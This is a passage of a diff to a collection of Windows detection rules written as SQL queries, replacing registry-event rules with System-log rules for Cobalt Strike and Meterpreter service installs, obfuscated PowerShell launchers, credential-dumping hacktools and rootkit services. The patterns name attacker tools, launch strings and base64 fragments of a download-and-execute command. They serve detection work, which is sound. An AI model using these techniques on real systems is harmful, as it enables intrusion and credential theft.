'%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation STDIN+ Launcher - System", + "id": "72862bf2-0eb1-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of stdin to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Software installers downloaded and used by users" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Temporary Internet Files\\\\Content.Outlook\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Local Settings\\\\Temporary Internet Files\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\' AND (ImagePath LIKE '%/c%' ESCAPE '\\' OR ImagePath LIKE '%/r%' ESCAPE '\\')) AND (ImagePath LIKE '%noexit%' ESCAPE '\\' OR (ImagePath LIKE '%input%' ESCAPE '\\' AND ImagePath LIKE '%$%' ESCAPE '\\')))" ], - "filename": "registry_event_susp_download_run_key.yml" + "filename": "win_system_invoke_obfuscation_stdin_services.yml" }, { - "title": "Narrator's Feedback-Hub Persistence", - "id": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "status": "test", - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "author": "Dmitriy Lifanov, oscd.community", + "title": "New Service Uses Double Ampersand in Path", + "id": "ca83e9f3-657a-45d0-88d6-c1ac280caf53", + "status": "experimental", + "description": "Detects a service installation that uses a suspicious double ampersand used in the image path value", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'DeleteValue' AND TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR TargetObject LIKE '%\\\\AppXypsaf9f1qserqevf0sws76dx4k9a5206\\\\Shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&%' ESCAPE '\\')" ], - "filename": "registry_event_narrator_feedback_persistance.yml" + "filename": "win_system_service_install_susp_double_ampersand.yml" }, { - "title": "Pandemic Registry Key", - "id": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "status": "test", - "description": "Detects Pandemic Windows Implant", - "author": "Florian Roth (Nextron Systems)", + "title": "Invoke-Obfuscation Via Use Clip - System", + "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\services\\\\null\\\\Instance%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" ], - "filename": "registry_event_apt_pandemic.yml" + "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" }, { - "title": "Wdigest CredGuard Registry Modification", - "id": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "status": "test", - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Invoke-Obfuscation Via Use MSHTA - System", + "id": "7e9c7999-0f9b-4d4a-a6ed-af6d553d4af4", + "status": "experimental", + "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1112" + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\IsCredGuardEnabled' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%mshta%' ESCAPE '\\' AND ImagePath LIKE '%vbscript:createobject%' ESCAPE '\\')" ], - "filename": "registry_event_disable_wdigest_credential_guard.yml" + "filename": "win_system_invoke_obfuscation_via_use_mshta_services.yml" }, { - "title": "WINEKEY Registry Modification", - "id": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "status": "test", - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "author": "omkar72", + "title": "Invoke-Obfuscation CLIP+ Launcher - System", + "id": "f7385ee2-0e0c-11eb-adc1-0242ac120002", + "status": "experimental", + "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", + "author": "Jonathan Cheong, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\Backup Mgr' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND ImagePath LIKE '%clipboard]::%' ESCAPE '\\')" ], - "filename": "registry_event_runkey_winekey.yml" + "filename": "win_system_invoke_obfuscation_clip_services.yml" }, { - "title": "Registry Entries For Azorult Malware", - "id": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", + "title": "CobaltStrike Service Installations - System", + "id": "5a105d34-05fc-401e-8553-272b45c1522d", "status": "test", - "description": "Detects the presence of a registry key created during Azorult execution", - "author": "Trent Liffick", + "description": "Detects known malicious service installs that appear in cases in which a Cobalt Strike beacon elevates privileges or lateral movement", + "author": "Florian Roth (Nextron Systems), Wojciech Lesicki", "tags": [ "attack.execution", - "attack.t1112" + "attack.privilege_escalation", + "attack.lateral_movement", + "attack.t1021.002", + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND EventID IN ('12', '13') AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\services\\\\localNETService' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%ADMIN$%' ESCAPE '\\' AND ImagePath LIKE '%.exe%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%start%' ESCAPE '\\' AND ImagePath LIKE '%powershell%' ESCAPE '\\') OR ImagePath LIKE '%powershell -nop -w hidden -encodedcommand%' ESCAPE '\\' OR ImagePath LIKE '%SUVYIChOZXctT2JqZWN0IE5ldC5XZWJjbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTI3LjAuMC4xO%' ESCAPE '\\' OR ImagePath LIKE '%lFWCAoTmV3LU9iamVjdCBOZXQuV2ViY2xpZW50KS5Eb3dubG9hZFN0cmluZygnaHR0cDovLzEyNy4wLjAuMT%' ESCAPE '\\' OR ImagePath LIKE '%JRVggKE5ldy1PYmplY3QgTmV0LldlYmNsaWVudCkuRG93bmxvYWRTdHJpbmcoJ2h0dHA6Ly8xMjcuMC4wLjE6%' ESCAPE '\\'))" ], - "filename": "registry_event_mal_azorult.yml" + "filename": "win_system_cobaltstrike_service_installs.yml" }, { - "title": "RedMimicry Winnti Playbook Registry Manipulation", - "id": "5b175490-b652-4b02-b1de-5b5b4083c5f8", + "title": "Hacktool Service Registration or Execution", + "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", "status": "test", - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "author": "Alexander Rausch", + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%HKLM\\\\SOFTWARE\\\\Microsoft\\\\HTMLHelp\\\\data%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" ], - "filename": "registry_event_redmimicry_winnti_reg.yml" + "filename": "win_system_service_install_hacktools.yml" }, { - "title": "UAC Bypass Via Wsreset", - "id": "6ea3bf32-9680-422d-9f50-e90716b12a66", + "title": "ProcessHacker Privilege Elevation", + "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", "status": "test", - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "author": "oscd.community, Dmitry Uchakin", + "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.privilege_escalation", - "attack.t1548.002" + "attack.t1543.003", + "attack.t1569.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" ], - "filename": "registry_event_bypass_via_wsreset.yml" + "filename": "win_system_susp_proceshacker.yml" }, { - "title": "Potential Ransomware Activity Using LegalNotice Message", - "id": "8b9606c9-28be-4a38-b146-0e313cc232c1", - "status": "experimental", - "description": "Detect changes to the \"LegalNoticeCaption\" or \"LegalNoticeText\" registry values where the message set contains keywords often used in ransomware ransom messages", - "author": "frack113", + "title": "Service Installation with Suspicious Folder Pattern", + "id": "1b2ae822-6fe1-43ba-aa7c-d1a3b3d1d5f2", + "status": "test", + "description": "Detects service installation with suspicious folder patterns", + "author": "pH-T (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1491.001" + "attack.persistence", + "attack.privilege_escalation", + "car.2013-09-005", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeCaption%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LegalNoticeText%' ESCAPE '\\') AND (NewValue LIKE '%encrypted%' ESCAPE '\\' OR NewValue LIKE '%Unlock-Password%' ESCAPE '\\' OR NewValue LIKE '%paying%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[Cc]:\\\\[Pp]rogram[Dd]ata\\\\.{1,9}\\.exe' OR ImagePath REGEXP '^[Cc]:\\\\.{1,9}\\.exe'))" ], - "filename": "registry_set_legalnotice_susp_message.yml" + "filename": "win_system_susp_service_installation_folder_pattern.yml" }, { - "title": "Sticky Key Like Backdoor Usage - Registry", - "id": "baca5663-583c-45f9-b5dc-ea96a22ce542", + "title": "Important Windows Service Terminated With Error", + "id": "d6b5520d-3934-48b4-928c-2aa3f92d6963", "status": "experimental", - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "author": "Florian Roth (Nextron Systems), @twjackomo, Jonhnathan Ribeiro, oscd.community", + "description": "Detects important or interesting windows services that got terminated for whatever reason", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" + "attack.defense_evasion" ], "falsepositives": [ - "Unlikely" + "Rare false positives could occur since service termination could happen due to multiple reasons" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\sethc.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\utilman.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\osk.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Magnify.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\Narrator.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\DisplaySwitch.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\atbroker.exe\\\\Debugger' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Image File Execution Options\\\\HelpPane.exe\\\\Debugger' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7023') AND ((param1 LIKE '% Antivirus%' ESCAPE '\\' OR param1 LIKE '% Firewall%' ESCAPE '\\' OR param1 LIKE '%Application Guard%' ESCAPE '\\' OR param1 LIKE '%BitLocker Drive Encryption Service%' ESCAPE '\\' OR param1 LIKE '%Encrypting File System%' ESCAPE '\\' OR param1 LIKE '%Microsoft Defender%' ESCAPE '\\' OR param1 LIKE '%Threat Protection%' ESCAPE '\\' OR param1 LIKE '%Windows Event Log%' ESCAPE '\\') OR (Binary LIKE '%770069006e0064006500660065006e006400%' ESCAPE '\\' OR Binary LIKE '%4500760065006e0074004c006f006700%' ESCAPE '\\' OR Binary LIKE '%6d0070007300730076006300%' ESCAPE '\\' OR Binary LIKE '%530065006e0073006500%' ESCAPE '\\' OR Binary LIKE '%450046005300%' ESCAPE '\\' OR Binary LIKE '%420044004500530056004300%' ESCAPE '\\')))" ], - "filename": "registry_event_stickykey_like_backdoor.yml" + "filename": "win_system_service_terminated_error_important.yml" }, { - "title": "Registry Persistence Mechanisms in Recycle Bin", - "id": "277efb8f-60be-4f10-b4d3-037802f37167", + "title": "Invoke-Obfuscation Via Stdin - System", + "id": "487c7524-f892-4054-b263-8a0ace63fc25", "status": "experimental", - "description": "Detects persistence registry keys for Recycle Bin", - "author": "frack113", + "description": "Detects Obfuscated Powershell via Stdin in Scripts", + "author": "Nikita Nazarov, oscd.community", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.defense_evasion", + "attack.t1027", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((EventType = 'RenameKey' AND NewName LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open%' ESCAPE '\\') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{645FF040-5081-101B-9F08-00AA002F954E}\\\\shell\\\\open\\\\command\\\\(Default)%' ESCAPE '\\')))" - ], - "filename": "registry_event_persistence_recycle_bin.yml" - }, - { - "title": "Leviathan Registry Key Activity", - "id": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "status": "test", - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "author": "Aidan Bracher", - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "level": "critical", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE 'HKCU\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\ntkd' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_leviathan.yml" + "filename": 